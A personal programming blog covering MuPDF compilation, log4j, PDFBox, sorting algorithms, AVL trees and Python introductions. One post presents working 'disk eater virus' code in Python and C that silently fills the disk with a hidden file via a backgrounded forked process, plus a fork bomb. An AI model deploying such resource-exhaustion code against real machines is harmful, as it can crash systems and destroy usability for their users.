Neeraj's Blog

There is always an open source solution..

Compiling Mupdf from Source

MuPdf is a free and open source software library written in C that implements a pdf and xps parsing and rendering engine. You can download mupdf from http://code.google.com/p/mupdf/downloads/list. For windows just download “mupdf-1.0-tools-windows.zip” and install. For linux you cannot get a ready made package. You should download the source file and compile it.  For compiling from source, you will need several third party libraries: freetype2, jbig2dec, libjpeg, openjpeg, and zlib. From mupdf-download link, given above, you can download both the source file (mupdf-1.0-source.tar.gz) and third party files (mupdf-thirdparty-2012-04-23.zip).

(From here I explain very detail. It is for beginners in linux. If you are already familiar with “make“, don’t waste your time. Compile all the dependencies first. And after that compile mupdf source).

Compiling third party dependencies.

Extract the third party files. You will get a folder named “thirdparty“. Inside thirdparty, there will be 5 folders. We have to compile all of them one by one. Before starting you should install libtool.

sudo apt-get install  libtool.

After that we can start our compilation work. Lets start with freetype-2.4.9.

cd freetype-2.4.9

./configure (If it doesn’t work, sh autogen.sh and then ./configure).

make

sudo make install

Next we go for jbig2dec.

cd jbig2dec

sh autogen.sh

./configure (If you have no permission over configure to run, chmod 777 configure).

make

sudo make install

Next is jpeg-8d.

With the  jpeg-8d given by mupdf, I can’t compile it. So i decided to download it separately. You can also download it from http://www.ijg.org/. Download  jpegsrc.v8d.tar.gz from there (It is for linux). Decompress it. Then you will get a folder named   jpeg-8d. Now continue our compilation.

cd  jpeg-8d (new  jpeg-8d)

./configure (If you have no permission over configure to run, chmod 777 configure). 

make

sudo make install

Now we go for openjpeg-1.5.0

cd openjpeg-1.5.0

./configure (If you have no permission over configure to run, chmod 777 configure).

make

sudo make install

Next is  zlib-1.2.5

cd zlib-1.2.5

./configure (If you have no permission over configure to run, chmod 777 configure).

make

sudo make install

Compiling MuPdf source

Now all the dependencies are compiled. Now we can start compiling our mupdf source. Extract mupdf-1.0-source.tar.gz. Then,

cd mupdf-1.0-source

make

sudo make install

Now it is done. :)

man mupdf will show you the man page.

Note :- I am using ubuntu 11.10

Dynamic Log File

I am now working on a project, in which I have to  create a folder structure for each output and store the outputs in that folders. For storing log file, I decided to create a new folder named “log”, inside that folder structure, and save the log file in that folder for each input.

Previously, I was craeting a single log file named “admin.log”. So for several inputs, a single log file was a mess. In that case my log4j.property file was like this

# Root logger option
log4j.rootLogger=ALL, file
# Direct log messages to a log file
log4j.appender.file=org.apache.log4j.RollingFileAppender
log4j.appender.file.File=<my path>admin.log
log4j.appender.file.MaxFileSize=1GB
log4j.appender.file.MaxBackupIndex=1
log4j.appender.file.layout=org.apache.log4j.PatternLayout
log4j.appender.file.layout.ConversionPattern=%d{ABSOLUTE} %5p %c{1}:%L - %m%n

<my path> : The absolute path, where you want to save the admin.log

Now for my purpose I have to edit my main function only (no need to edit my log4j.property file). I added the following code snippet to my main function.

//Setting log file path
 String dynamicLog = "<my path>" + "admin.log";
 Properties p = new Properties();
 p.load(new FileInputStream("<property file path>\\log4j.properties"));
 p.put( "log4j.appender.file.File", dynamicLog ); // overwrite "log.dir"
 PropertyConfigurator.configure( p );

<my path> : the absolute  path to where I have to save admin.log. ( For me it is now ./inputId/log/admin.log”).

<property file path> : Absolute path to our log4j.property file.

I tested it, and worked properly. :)

Pdf to Html – update

After studying Michel Tu’s code i understand that he is using Apche Pdfbox , to process pdf and to convert it into Json format. So i decided to experiment with pdfbox. Pdfbox is a nice tool to work with pdfs. You can download its binaries or sources from here. With pdfbox you can easily convert pdf to text or html. You can extract only the text files from the pdf and can convert it into desired format. With  ExtractText  we can easily  extract text from pdf.

usage: java -jar pdfbox-app-x.y.z.jar ExtractText [OPTIONS] <PDF file> [Text file]

I downloaded pdfbox-app-1.6.0.jar and converted different pdf files to html and text to analyse its characteristics. From my experiments i observed that

  • It can convert every pdf, to html or text format, regardless of its size.
  • It convert pdf, to html or text format with fairly good speed.
  • It will extract all the text from the pdf files.
  • It can distinguish bulletins and number formats.
  • It will simply discard images, shapes drawn etc.It will not properly work with headings and tables. It will extract the heading but cannot distinguish that, it is a heading. And also we will get the table entries and its headings, but we cannot distinguish that they are from a table.

Now i want to analyse the running time of this conversion. So i decided to work with large number of files, and to convert them to html and text. For this i have to create a directory with a lot of pdf files. For this purpose i decides to make several copy of a same file (neeraj.pdf) and put it in a desired directory. For this i wrote a simple Perl script. I am adding the code below.


#!/usr/bin/perl
use File::Copy;

$filetobecopied = "neeraj.pdf";
for ($count = 10; $count >= 1; $count--) {
 $newfile = "./data/".$count.".pdf";
 copy($filetobecopied, $newfile) or die "File cannot be copied.";

My intention was to search for pdf files in that directory and convert it into text format. But for this i cannot call java -jar pdfbox-app-x.y.z.jar ExtractText [OPTIONS] <PDF file> [Text file] for each of my pdf files, because invoking jvm is a time consuming process. So i have to use pdfbox as library and to write a program for converting each file.
I got a code which convert a pdf file to text format from here. I edited this code for my purpose. I have to edit the code first to apt for my pdfbox version. For this i edited import statements. The next problem was this code will work with only one pdf. So i changed the code to search all the pdf in the directory, and convert them to text. Below I am showing only the changes i have made in the code. I just edited the main class only.

</pre>
public static void main(String args[]) {

String path = "/home/neeraj/Desktop/projtest/project/data/";

 String files;
 File folder = new File(path);
 File[] listOfFiles = folder.listFiles();

 for (int i = 0; i < listOfFiles.length; i++)
 {

 if (listOfFiles[i].isFile())
 {
 files = listOfFiles[i].getName();
 if (files.endsWith(".pdf") || files.endsWith(".PDF"))
 {
 System.out.println(files);
 String nfiles = "/home/neeraj/Desktop/projtest/project/data/";
 PDFTextParser pdfTextParserObj = new PDFTextParser();
 String pdfToText = pdfTextParserObj.pdftoText(nfiles+files);

 if (pdfToText == null) {
 System.out.println("PDF to Text Conversion failed.");
 }
 else {
 System.out.println("\nThe text parsed from the PDF Document....\n" + pdfToText);
 pdfTextParserObj.writeTexttoFile(pdfToText,nfiles+files+".txt");
 }
 }
}
 }
 }

It worked correctly and created text files of all pdf files in that directory.
Now i experiment with the running time of this code. So for this i ran this program with 1000, 2000, 3000, 4000, 5000 and 10,000 same pdf files. I worked with a fairly good speed.
I ran this code for 5 times in each number of files to check whether it work consistently with same time. The result is shown below.

Ran the code 5 times for same number of same document

Then i calculated the average time of this running time and plotted a graph.

Mean of the running times for different number of documents

The graph of the above table is given below. (This image is created from a pdf file using pdfbox).

X axis : Number of documents, Y axis : Running Time in sec

Limitation of PdfBox

The pdfbox simply extract the text from the pdf file. It cannot determine the logical structure of the content. That is whether the current word  is a heading, or from table, or list etc. Pdfbox converts pdf files to text with no intelligence, only by extracting all the text. This is the main limitation of the pdf box.

PDF to HTML

Now iam working on a new project of Michel Tu.

You can get the source code from  https://github.com/neumino/PDF-to-unusual-HTML/commit/6c28fd52962e68b17a5142db5bc5a7dc4b00cdc2.

I cloned the project to my local system. (You can use either mercurial or git for cloning. You can also download zip file of this project from the above link.) After that I created a java package and try to run it by the command java -jar. But it always ended up with an error. So I decided to to go for a better option of using NetBeans IDE instead of fixing the package building issue. I tried to run the source code of the project using NetBeans. (But before trying to run the project, please make sure that you have Imagemagick installed on your system.) But this time also, i got an error.

So I checked the code, and found that the system call,

command = pathToImagemagick+” -density ” +density+” “+pathToPdf+” “+pathToDirectory+imageName; 

in the file Pdf2Json is not working properly. To make sure that, I run the command in my terminal as

convert -density 108 /home/neeraj/NetBeansProjects/icresume.pdf /home/neeraj/NetBeansProjects/icresume-0.png 

I found that it is not working, and got error messages.

Then I run the same command with a little change

/usr/bin/convert -density 108 /home/neeraj/NetBeansProjects/icresume.pdf /home/neeraj/NetBeansProjects/icresume-0.png 

Then it worked properly. So  I changed the pathToImagemagick variable in the class ConvertPdf as follows

static String pathToImagemagick = “/usr/bin/convert”;

After doing this, i can successfully run the project. After running, i got the following files.

pdffile-x.png image files of each page of the pdf file

and a pdfile_words.txt which contains the all words of pdf file with their position in JSON format.

Sorting Algorithms 2

Quick Sort

This algorithm was developed by Tony Hoare in 1960. It is a divide and conquer algorithm.

Algorithm is as follows

  1. Select an element ‘pivot’ from the list.
  2. Reorder the list so that all elements with values less than the pivot come before the pivot, while all elements with values greater than the pivot come after it.
  3. Recursively sort the sub-lists of lesser elements and greater elements.
Code In C

void qsort(int v[], int left, int right)
{
 int i, last;
 void swap(int v[], int i, int j);
 if(left >= right)
 return;
 swap(v, left, (left+right)/2);
 last = left;
 for(i = left+1; i <= right; i++){
 if(v[i] < v[left])
 swap(v, ++last, i);
 }
 swap(v, left, last);
 qsort(v, left, last-1);
 qsort(v, last+1, right);
}

Time Analysis

Worst case : O(n²)

Best case : O(n log n)

Average case: O(n log n)

In the best case, each time the list is divided into two equal half. So there will be log n nested calls. And this operation is done n times.

Recurrence relation is T(n) = O(n) + 2T(n/2).

And also selecting the pivot plays a good role in time complexity. For already sorted list selecting the middle element or random element is better than selecting first or last element.

Merge Sort

Merge sort was developed by  John Von Neumann in 1945. It is also a divide and conquer algorithm. It always does  a fewer comparison as compared to quick sort.

Algorithm is as follows

  1. Divide the element into n sub-lists of single elements. Now each sub-list is sorted since there is only one element.
  2. Repeatedly merge sub-lists to to produce a larger sub-list which should be in a sorted list. Until a n element single list is obtained.
Code in C

void msort(int a[], int low, int high)
{
 void merge(int a[], int, int, int);
 int mid;
 if(low < high){
 mid = (low + high)/2;
 msort(a, low, mid);
 msort(a, mid+1, high);
 merge(a,low,high,mid);
 }
}

void merge(int a[], int low, int high, int mid)
{
 int i,j,k, c[50];
 i = low;
 j = mid + 1;
 k = low;
 while((i <= mid) && (j <= high)){
 if(a[i] < a[j])
 c[k++] = a[i++];
 else
 c[k++] = a[j++];
 }
 while(i <= mid)
 c[k++] = a[i++];
 while(j <= high)
 c[k++] = a[j++];
 for(i = low; i < k; i++)
 a[i] = c[i];
}

Time Analysis

Worst case : O(n log n)

Best case : O(n log n)

Average case : O(n log n)

Sorting Algorithms 1

Bubble Sort

In bubble sorting we compare the two adjacent elements, and swap them if they are not in order.

Code in C

void bubsort(int v[], int n)
{
 int i,j,temp;
 for(i = n-2; i >= 0; i--)
 for(j = 0; j <= i; j++)
 if(v[j] > v[j+1]){
 temp = v[j];
 v[j] = v[j+1];
 v[j+1] = temp;
 }
}

Time Analysis

Worst case : O(n²)

Best case : O(n)

Average case: O(n²)

Best case is when the input is a sorted one, and worst case is when the input is reverse sorted.

Insertion Sort

In insertion sort we check each element and put it in the right place in a sorted list.

It is efficient for small data sets. More efficient than bubble and selection sort of same time complexity.

Code in C

void insertsort(int v[], int n)
{
 int i, j, key;

for(i = 1; i < n-1; i++) {
 j = i;
 key = v[i];

while(v[j-1] > key && j>0){
 v[j] = v[j-1];
 j = j-1;
 }
 v[j] = key;
 }
}

Time Analysis

Worst case : O(n²)

Best case : O(n)

Average case : O(n²)

Best case is when the input is a sorted one, and worst case is when the input is reverse sorted.

Selection Sort

Algorithm is as follows

  1. Find the minimum value in the list.
  2. Swap it with the value in the first position.
  3. Repeat the steps above for the remainder of the list. (starting at the second position and advancing each time)
Code In C
void selectsort(int v[], int n)
{
 int i, min, pos, temp;
 for(pos= 0; pos<n; pos++) {
 min = pos;
 for(i = pos+1; i<n; i++){
 if(v[i] < v[min])
 min = i;
 }
 if(min != pos){
 temp = v[min];
 v[min] = v[pos];
 v[pos] = temp;
 }
 }
}

Time Analysis

Worst case : O(n²)

Best case : O(n²)

Average case : O(n²)

In selection sort, every time, the time complexity is of O(n²).

AVL Tree

AVL tree is an interesting data structure invented by G.M Adelson-Velskii and E.M.Landis. It is a self balancing binary tree. Self balancing means doing some operations, the tree tries to keep its height as low as possible. Most operations on a binary search tree (BST) take time directly proportional to the height of the tree, so it is desirable to keep the height small.

In an avl tree the height of the two sub trees differ at most one. Lookup, insertion, and deletion all take O(log n) time in both the average and worst cases, where n is the number of nodes in the tree prior to the operation. Insertions and deletions may require the tree to be rebalanced by one or more tree rotations.

The balance factor of a node is the height of its left subtree minus the height of its right subtree (sometimes opposite) and a node with balance factor 1, 0, or −1 is considered balanced. A node with any other balance factor is considered unbalanced and requires rebalancing the tree.

Now we can try to analyse insertion function of an avl tree. If we can write an insertion function we can also write look up function also.

Inserting into an avl tree is same as the insertion into an ordinary bst. But after inserting an element we have to make sure that the tree is balanced. If the balance factor remains −1, 0, or +1 then no rotations are necessary. However, if the balance factor becomes ±2 then the subtree rooted at this node is unbalanced.

There are four cases which need to be considered, of which two are symmetric to the other two. Let P be the root of the unbalanced subtree, with R and L denoting the right and left children of P respectively.

Right-Right case and Right-Left case:

  • If the balance factor of P is -2 then the right subtree outweighs the left subtree of the given node, and the balance factor of the right child (R) must be checked. The left rotation with P as the root is necessary.
  • If the balance factor of R is -1, a single left rotation(with P as the root) is needed (Right-Right case).
  • If the balance factor of R is +1, two different rotations are needed. The first rotation is a right rotation with R as the root. The second is a left rotation with P as the root (Right-Left case).

Left-Left case and Left-Right case:

  • If the balance factor of P is +2, then the left subtree outweighs the right subtree of the given node, and the balance factor of the left child (L) must be checked. The right rotation with P as the root is necessary.
  • If the balance factor of L is +1, a single right rotation(with P as the root) is needed (Left-Left case).
  • If the balance factor of L is -1, two different rotations are needed. The first rotation is a left rotation with L as the root. The second is a right rotation with P as the root (Left-Right case).

Pictorial description of how rotations cause rebalancing tree, and then retracing one's steps toward the root updating the balance factor of the nodes. The numbered circles represent the nodes being balanced. The lettered triangles represent subtrees which are themselves balanced BSTs

The c code implementation of avltree can get from https://bitbucket.org/neeraj_r/data-structures/changeset/2adb14b6ffa5

Hard Disk Space Eating virus for Linux

While browsing, i stuck on the word disk space eating virus.. This virus gradually eats all the free space in our hard disk. There were so many codes but all of them was complicated and for windows.. But my intention was not to crack the system, but only to hack it. So i decided to make a disk eater for linux. I asked tony about this disk eater virus. He gave me the idea of creating a gradually growing file with simple random function. So i decided to check it out. Wrote a python code for create a continuous growing hidden file using random function. The code is given below.

import random

  def get_random_word(wordLen):
  word = ''
  for i in range(wordLen):
    word += random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz')
  return word

def main():
  fout = open('.wordlist.txt' , 'w')
  i = 1
  while True:
    wordLen = random.randint(500,1500)
    word  = get_random_word(wordLen)
    if i % 500000 == 0:
      fout.close()
      fout = open('.wordlist.txt' , 'a')
      print i
      i = 1
    fout.write(word+"\n")
    i += 1
    fout.close()
if __name__ == "__main__":
main()

Run this code creates a hidden file named .wordlist.txt.This file will continuously grow on size until you stop running that code. You can check the file size and can see that it is growing constantly. But the problem with this code was we can see that the process is running, and to keep a terminal always for running this process. Pressing ctrl+c will kill this virus. So to make the virus more interesting i have avoid this. I know that it can be done only using thread, but how? Again i googled it. So i stuck on another most common simple virus, fork bomb…

#include
int main()
{
    while(1)
    fork();
}

If you are running this code, the only way to get rid of it is, restarting your system.

But since i was not familiar with threads i asked tony for help. Then he told me about the orphans and also said that, for writing virus like stuff C will be better.

So we decided to code it in C. And our code is given below.

#include
#include
#include
int main()
{
  FILE *fd;
  int pid;
  int i;
  char buf[4096];
  buf[0] = 1;
  for(i = 1; i <= 4096; i++) {
buf[i] = (char) i;
}
  buf[4095] = '\0';
  if((fd = fopen(".abc.txt", "w")) == NULL) {
    perror("open");
    exit(errno);
  }
  fputs(buf,stdout);
  if((pid = fork()) < 0) {
    perror("fork");
    exit(errno);
  }
  if(pid == 0) {
    while(1) {
      if(fputs(buf,fd) == EOF) {
        perror("write");
        exit(errno);
      }
      fclose(fd);
      if((fd = fopen(".abc.txt", "a")) == NULL) {
        perror("open1");
        exit(errno);
      }
    }
  }
}    

This is our Disk Eater Virus..

If you run this code it will show you some junk, and will exit. But actually it will not. In background the child process will run creating a file named .abc.txt. You can see the process running by using the command ps -ax .Checking the file size shows you that how fast it is growing. It is much faster than the previous python code. The way to stop  that code is kill that process, by the command killall -9 a.out.

Python Run time structure

Actually all the complexities in running a python code is deliberately hidden from the programmers. We type code into text files, and run those files through the interpreter. But something more  is happening. The basic understanding of the run time structure of python can help to understand a detailed picture of program execution.

First the python script is compiled to byte code and then routed to a virtual machine.

Byte code compilation

Python first compiles the source code of the program to “byte  code“. Byte code is low level, platform independent representation of the source code. Byte code run more quickly than the source code. Python does not need to reanalyze and reparse each source statement repeatedly. The net effect is that pure Python code runs at speeds somewhere between those of a traditional compiled language and a traditional interpreted language. Python will store the byte code wit a .pyc (means compiled .py source) extension. When we run the source code for the second time, python will load the byte code, skips the compilation step unless we have not change the code.

Python Virtual Machine (PVM)

Once your byte code is formed, then it is carried to python virtual machine for execution. PVM is a big loop that iterates through the byte code instructions, one by one to carry out their operations. PVM is run time of engine of python. It is the component that actually runs the code.

Python’s traditional runtime execution model: source code you type is translated to byte code, which is then run by the Python Virtual Machine. Your code is automatically compiled, but then it is interpreted.

Python-Introduction

Python is a programming language that lets you work more quickly and more effectively. Python creator Guido van Rossum named this language after the BBC comedy series Monty Python’s Flying Circus. He is a big fan of Monty Python. Python language is easier to learn, understand and remember.  Its simple syntax, dynamic typing, lack of compile steps, and built-in toolset allow programmers to develop programs quickly. Python is not only a scripting language, but also a general-purpose language. It is also object oriented language. Python is an open source system. So it has a large and active development community that responds to issues and develop enhancements.

Python’s some top technical features are :

It’s Object-Oriented:

Its class model supports polymorphism, inheritance, operator-overloading,  and multiple-inheritance etc. even though with python’s simle syntaxand typing.

It’s Free:

Python is completely free to use and distribute.

It’s Potable:

The standard implementation of python is written in portable ANSI C, and it compiles and runs on virtually every major platform currently in use.

It’s Powerfull:

Python provides all the simplicity and ease of use of a scripting language, along with more advanced software-engineering tools typically found in compiled languages. This combination makes it useful for large-scale development projects.

Here are some of the main things in Python’s toolbox:

  • Dynamic Typing: Python keeps track of the kinds of objects your program uses when it runs; it doesn’t require complicated type and size declarations in your code. Python code does not constrain data types.
  • Automatic memory management: Python automatically allocates objects and reclaims (“garbage collects”) them when they are no longer used, and most can grow and shrink on demand. Python keeps track of low-level memory details so we don’t have to.
  • Programming-in-the-large support: For building larger systems, Python includes tools such as modules, classes, and exceptions.
  • Built-in object types: Python provides commonly used data structures such as lists, dictionaries, and strings as intrinsic parts of the language; as we’ll see, they’re both flexible and easy to use.
  • Built-in tools: To process all those object types, Python comes with powerful and standard operations, including concatenation (joining collections), slicing (extracting sections), sorting, mapping, and more.
  • Library utilities: For more specific tasks, Python also comes with a large collection of precoded library tools that support everything from regular expression matching to networking.
  • Third-party utilities: Because Python is open source, developers are encouraged to contribute precoded tools that support tasks beyond those supported by its built-ins.

Post Navigation

Follow

Get every new post delivered to your Inbox.